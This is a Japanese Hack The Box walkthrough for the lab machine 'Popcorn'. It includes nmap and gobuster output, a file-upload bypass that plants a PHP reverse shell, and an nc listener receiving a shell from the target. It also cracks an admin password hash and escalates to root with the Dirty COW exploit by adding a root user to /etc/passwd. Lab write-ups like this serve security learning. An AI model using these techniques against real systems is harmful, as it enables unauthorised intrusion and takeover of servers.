はじめに
筆者は Hack the Box 初心者です。 何か訂正や補足、アドバイスなどありましたら、コメントか Twitter までお願いします。 さんぽし(@sanpo_shiho) | Twitter
cheat sheet
以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。 github | sanposhiho/MYCHEATSHEET
machine について
難易度は medium です
nmap
# Nmap 7.80 scan initiated Fri Jul 3 14:23:02 2020 as: nmap -vv --reason -Pn -sV -sC --version-all -oN /home/kali/results/10.10.10.6/scans/_quick_tcp_nmap.txt -oX /home/kali/results/10.10.10.6/scans/xml/_quick_tcp_nmap.xml 10.10.10.6
Nmap scan report for 10.10.10.6
Host is up, received user-set (0.26s latency).
Scanned at 2020-07-03 14:23:02 EDT for 49s
Not shown: 998 closed ports
Reason: 998 conn-refused
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAIAn8zzHM1eVS/OaLgV6dgOKaT+kyvjU0pMUqZJ3AgvyOrxHa2m+ydNk8cixF9lP3Z8gLwquTxJDuNJ05xnz9/DzZClqfNfiqrZRACYXsquSAab512kkl+X6CexJYcDVK4qyuXRSEgp4OFY956Aa3CCL7TfZxn+N57WrsBoTEb9PAAAAFQDMosEYukWOzwL00PlxxLC+lBadWQAAAIAhp9/JSROW1jeMX4hCS6Q/M8D1UJYyat9aXoHKg8612mSo/OH8Ht9ULA2vrt06lxoC3O8/1pVD8oztKdJgfQlWW5fLujQajJ+nGVrwGvCRkNjcI0Sfu5zKow+mOG4irtAmAXwPoO5IQJmP0WOgkr+3x8nWazHymoQlCUPBMlDPvgAAAIBmZAfIvcEQmRo8Ef1RaM8vW6FHXFtKFKFWkSJ42XTl3opaSsLaJrgvpimA+wc4bZbrFc4YGsPc+kZbvXN3iPUvQqEldak3yUZRRL3hkF3g3iWjmkpMG/fxNgyJhyDy5tkNRthJWWZoSzxS7sJyPCn6HzYvZ+lKxPNODL+TROLkmQ==
| 2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAyBXr3xI9cjrxMH2+DB7lZ6ctfgrek3xenkLLv2vJhQQpQ2ZfBrvkXLsSjQHHwgEbNyNUL+M1OmPFaUPTKiPVP9co0DEzq0RAC+/T4shxnYmxtACC0hqRVQ1HpE4AVjSagfFAmqUvyvSdbGvOeX7WC00SZWPgavL6pVq0qdRm3H22zIVw/Ty9SKxXGmN0qOBq6Lqs2FG8A14fJS9F8GcN9Q7CVGuSIO+UUH53KDOI+vzZqrFbvfz5dwClD19ybduWo95sdUUq/ECtoZ3zuFb6ROI5JJGNWFb6NqfTxAM43+ffZfY28AjB1QntYkezb1Bs04k8FYxb5H7JwhWewoe8xQ==
80/tcp open http syn-ack Apache httpd 2.2.12 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul 3 14:23:51 2020 -- 1 IP address (1 host up) scanned in 49.05 seconds80 番
gobuster
/.hta (Status: 403) [Size: 282]
/.hta.txt (Status: 403) [Size: 286]
/.hta.html (Status: 403) [Size: 287]
/.hta.php (Status: 403) [Size: 286]
/.hta.asp (Status: 403) [Size: 286]
/.hta.aspx (Status: 403) [Size: 287]
/.hta.jsp (Status: 403) [Size: 286]
/.htaccess (Status: 403) [Size: 287]
/.htaccess.txt (Status: 403) [Size: 291]
/.htaccess.html (Status: 403) [Size: 292]
/.htaccess.php (Status: 403) [Size: 291]
/.htaccess.asp (Status: 403) [Size: 291]
/.htaccess.aspx (Status: 403) [Size: 292]
/.htaccess.jsp (Status: 403) [Size: 291]
/.htpasswd (Status: 403) [Size: 287]
/.htpasswd.txt (Status: 403) [Size: 291]
/.htpasswd.html (Status: 403) [Size: 292]
/.htpasswd.php (Status: 403) [Size: 291]
/.htpasswd.asp (Status: 403) [Size: 291]
/.htpasswd.aspx (Status: 403) [Size: 292]
/.htpasswd.jsp (Status: 403) [Size: 291]
/cgi-bin/ (Status: 403) [Size: 286]
/cgi-bin/.html (Status: 403) [Size: 291]
/index (Status: 200) [Size: 177]
/index.html (Status: 200) [Size: 177]
/index.html (Status: 200) [Size: 177]
/test (Status: 200) [Size: 47043]
/test.php (Status: 200) [Size: 47055]
/torrent (Status: 301) [Size: 310]/torrent を開くと以下のような torrent hoster と言うのが出てきます
kali@kali:~$ gobuster dir -u http://10.10.10.6/torrent/ -w /usr/share/dirb/wordlists/big.txt -k -t 40 -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.6/torrent/
[+] Threads: 40
[+] Wordlist: /usr/share/dirb/wordlists/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
2020/07/08 14:53:07 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/admin (Status: 301)
/browse (Status: 200)
/browse.php (Status: 200)
/comment (Status: 200)
/comment.php (Status: 200)
/config (Status: 200)
/config.php (Status: 200)
/css (Status: 301)
/database (Status: 301)
/download (Status: 200)
/download.php (Status: 200)
/edit (Status: 200)
/edit.php (Status: 200)
/health (Status: 301)
/hide (Status: 200)
/images (Status: 301)
/index (Status: 200)
/index.php (Status: 200)
/js (Status: 301)
/lib (Status: 301)
/login (Status: 200)
/login.php (Status: 200)
/logout (Status: 200)
/logout.php (Status: 200)
/preview (Status: 200)
/readme (Status: 301)
/rss (Status: 200)
/rss.php (Status: 200)
/secure (Status: 200)
/secure.php (Status: 200)
/stylesheet (Status: 200)
/templates (Status: 301)
/thumbnail (Status: 200)
/thumbnail.php (Status: 200)
/torrents (Status: 301)
/torrents.php (Status: 200)
/upload (Status: 301)
/upload.php (Status: 200)
/upload_file (Status: 200)
/upload_file.php (Status: 200)
/users (Status: 301)
/validator (Status: 200)
/validator.php (Status: 200)
===============================================================
2020/07/08 15:00:05 Finished
===============================================================shell 取る
適当に register して login します
login しました
こう言う upload 系の物は php とかのファイルを upload して…パターンだろうなーと思って upload を試みますが、
失敗します
torrent file と言う形式の物しか upload できないようです
とりあえず KaliLinux の torrent file を公式から落として upload します(もちろん成功します
色々弄ってると、スクリーンショットを upload できるようです https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
形式が指定されているのでとりあえず以下を .php.png にして upload しようとしてみると成功します
/torrent/upload を覗くとファイルが増えているのでここに upload されるのかぁとなります、が.php.png だと php ファイルとして認識されていません
(↓id.png で upload されるっぽい)
うーんと思って色々いじってると、burp でキャッチした filename をいじると拡張子を変更して upload できることに気がつきます
これで nc で待ち受けてから php ファイルを開くと shell が取れます
kali@kali:~$ nc -lnvp 1212
listening on [any] 1212 ...
connect to [10.10.14.48] from (UNKNOWN) [10.10.10.6] 43995
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
08:00:20 up 2:47, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ python3 -c "__import__('pty').spawn('/bin/bash')"
/bin/sh: python3: not found
$ python -c "__import__('pty').spawn('/bin/bash')"
www-data@popcorn:/$PE
色々みてると DB に Admin っぽいパスワードが書いてあり、
www-data@popcorn:/var/www/torrent/database$ find .
find .
.
./th_database.sql
www-data@popcorn:/var/www/torrent/database$ cat th_database.sql
(略)
INSERT INTO `users` VALUES (3, 'Admin', '1844156d4166d94387f1a4ad031ca5fa', 'admin', '[email protected]', '2007-01-06 21:12:46', '2007-01-06 21:12:46');https://hashtoolkit.com/reverse-md5-hash/1844156d4166d94387f1a4ad031ca5fa
root/admin12 で ssh しようとしても失敗します(なんやねん…
linpeas
====================================( Basic information )=====================================
OS: Linux version 2.6.31-14-generic-pae (buildd@rothera) (gcc version 4.4.1 (Ubuntu 4.4.1-4ubuntu8) ) #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: popcorn
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h)linpeas 使うまでもなく Linux の version が低いです
dirty cow
https://www.exploit-db.com/exploits/40839
www-data@popcorn:/tmp$ gcc -pthread 40839.c -o dirty -lcrypt
gcc -pthread 40839.c -o dirty -lcrypt
www-data@popcorn:/tmp$ ./dirty okok
./dirty okok
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: okok
Complete line:
firefart:fiIb0NYY1TKz.:0:0:pwned:/root:/bin/bash
mmap: b783c000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'okok'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
www-data@popcorn:/tmp$
www-data@popcorn:/tmp$ Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'okok'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwdこれで firefart:okok で ssh できるようになります(su も可)
終わりに
これ別解で解いてる人が多くてホェーってなってました
別解 PE
www-data@popcorn:/home/george/.cache$ ls
ls
motd.legal-displayedこのファイルに着目して motd に関連する exploit を探します
kali@kali:~$ searchsploit MOTD
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1) | exploits/linux/local/14273.sh
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2) | exploits/linux/local/14339.sh
MultiTheftAuto 0.5 patch 1 - Server Crash / MOTD Deletion | exploits/windows/dos/1235.c
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result